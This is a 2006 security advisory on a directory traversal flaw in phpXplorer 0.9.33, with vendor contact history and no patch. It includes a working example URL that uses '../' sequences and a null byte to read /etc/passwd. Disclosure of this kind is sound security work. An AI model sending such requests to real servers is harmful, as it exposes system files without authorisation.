========================================================== Title: Directory traversal in phpXplorer Application: phpXplorer Vendor: http://www.phpxplorer.org Vulnerable Versions: 0.9.33 Bug: directory traversal Date: 16-January-2006 Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com > References: http://www.arrelnet.com/advisories/adv20060116.html ========================================================== 1) Background ----------- phpXplorer is an open source file management system written in PHP. It enables you to work on a remote file system through a web browser. 2) Problem description -------------------- An attacker can read arbitrary files outside the web root by sending specially formed requests Ex: http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 3) Solution: ---------- No Patch available. 4) Timeline --------- 17/12/2005 Bug discovered 20/12/2005 Vendor receives detailed advisory. No response 04/01/2006 Second notification. No response 16/01/2006 Public Disclosure